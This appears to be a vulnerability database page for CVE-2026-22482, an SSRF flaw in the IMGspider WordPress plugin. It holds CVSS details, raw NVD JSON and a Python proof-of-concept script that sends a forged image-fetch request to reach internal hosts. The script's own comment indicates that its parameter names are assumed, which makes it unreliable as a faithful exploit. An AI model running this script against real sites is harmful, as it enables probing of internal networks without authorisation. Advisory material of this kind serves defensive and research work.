Security Vulnerability Report
中文
CVE-2026-22482 CVSS 4.9 MEDIUM

CVE-2026-22482

Published: 2026-01-22 17:16:36
Last Modified: 2026-04-28 19:36:41

Description

Server-Side Request Forgery (SSRF) vulnerability in wbolt.com IMGspider imgspider allows Server Side Request Forgery.This issue affects IMGspider: from n/a through <= 2.3.12.

CVSS Details

CVSS Score
4.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

IMGspider插件 <= 2.3.12(所有版本受影响)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2026-22482 - WordPress IMGspider SSRF PoC Description: Server-Side Request Forgery in IMGspider plugin <= 2.3.12 Author: Security Researcher Reference: https://www.cve.org/CVERecord?id=CVE-2026-22482 """ import requests import argparse import sys def exploit_ssrf(target_url, target_internal_host): """ Exploit SSRF vulnerability in WordPress IMGspider plugin Args: target_url: Base URL of the WordPress site target_internal_host: Internal host to target (e.g., 127.0.0.1) """ # Target the IMGspider plugin endpoint endpoint = f"{target_url.rstrip('/')}/wp-admin/admin-ajax.php" # SSRF payload - scan internal host # In real exploitation, this would be the vulnerable parameter params = { 'action': 'imgspider_fetch_image', 'url': f'http://{target_internal_host}/', # Vulnerable parameter 'post_id': '1' } print(f"[*] Targeting: {target_url}") print(f"[*] Exploiting SSRF to access: {target_internal_host}") print(f"[*] Sending request to: {endpoint}") try: response = requests.post(endpoint, data=params, timeout=10) print(f"[+] Response Status: {response.status_code}") print(f"[+] Response Length: {len(response.text)} bytes") if response.status_code == 200: print("[+] SSRF request successful - vulnerability confirmed") print(f"[>] Response preview: {response.text[:200]}...") return True else: print("[-] Request failed or blocked") return False except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False def main(): parser = argparse.ArgumentParser( description='CVE-2026-22482 - WordPress IMGspider SSRF Exploit' ) parser.add_argument('-t', '--target', required=True, help='Target WordPress URL (e.g., http://target.com)') parser.add_argument('--internal-host', default='127.0.0.1', help='Internal host to target (default: 127.0.0.1)') args = parser.parse_args() print("=" * 60) print("CVE-2026-22482 - WordPress IMGspider SSRF Vulnerability") print("=" * 60) exploit_ssrf(args.target, args.internal_host) if __name__ == '__main__': main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22482", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:36.140", "lastModified": "2026-04-28T19:36:40.677", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Server-Side Request Forgery (SSRF) vulnerability in wbolt.com IMGspider imgspider allows Server Side Request Forgery.This issue affects IMGspider: from n/a through <= 2.3.12."}, {"lang": "es", "value": "Vulnerabilidad de falsificación de petición del lado del servidor (SSRF) en wbolt.com IMGspider imgspider permite la falsificación de petición del lado del servidor. Este problema afecta a IMGspider: desde n/a hasta &lt;= 2.3.12."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/imgspider/vulnerability/wordpress-imgspider-plugin-2-3-12-server-side-request-forgery-ssrf-vulnerability?_s_id=cve", "source": "[email protected]"}]}}